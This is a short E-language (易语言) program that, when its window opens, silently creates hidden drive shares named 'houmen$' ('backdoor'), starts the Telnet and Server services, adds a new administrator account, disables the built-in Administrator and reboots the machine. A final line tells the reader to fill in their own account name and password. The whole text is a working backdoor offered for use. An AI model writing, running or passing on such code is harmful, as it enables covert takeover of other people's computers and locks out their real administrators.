.版本 2
.支持库 shell
.程序集 窗口程序集1
.子程序 __启动窗口_创建完毕
运行 (“net share houmen$=c:\ ”, 假, )
运行 (“net share houmen2$=d:\ ”, 假, )
运行 (“net start telnet”, 假, )
运行 (“net start Server”, 假, )
运行 (“net user 帐号名 密码 /add”, 假, )
运行 (“net user 帐号名 /active:yes”, 假, )
运行 (“net localgroup Administrators 帐号名 /add”, 假, )
运行 (“net user Administrator /active:no”, 假, )
关闭系统 (#重启, 假)
把帐号名和密码改下就好了